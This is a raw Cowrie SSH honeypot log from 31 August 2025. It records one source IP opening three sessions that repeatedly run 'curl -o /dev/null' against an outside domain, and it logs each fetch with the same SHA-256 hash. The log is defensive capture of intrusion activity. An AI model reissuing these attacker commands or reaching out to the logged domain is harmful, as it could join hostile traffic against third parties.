{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.461808Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.480758Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.481473Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.483074Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.484203Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.486985Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.488980Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.491902Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.494583Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.516306Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.516995Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.520612Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.524772Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.525491Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.526732Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.527366Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.529843Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.557701Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.558432Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.564832Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.565416Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.568327Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.572490Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.573090Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.598907Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.601210Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.604464Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.605631Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.606032Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.608775Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.609162Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.613019Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.613489Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.645414Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.646476Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.647260Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.651418Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.653633Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.654310Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.656269Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.657269Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.663157Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.688852Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.689941Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.690445Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.693682Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.698523Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.699433Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.701106Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.701485Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.729208Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.729877Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.733063Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.735200Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.737392Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.739441Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.739895Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.741234Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.741876Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.746864Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.773254Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.774576Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.775449Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.780259Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.783420Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.813468Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.814178Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.816779Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.817202Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.818969Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.819339Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.855963Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.858108Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.862440Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.863532Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.863958Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.894551Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.895306Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:20.900511Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:20.901114Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
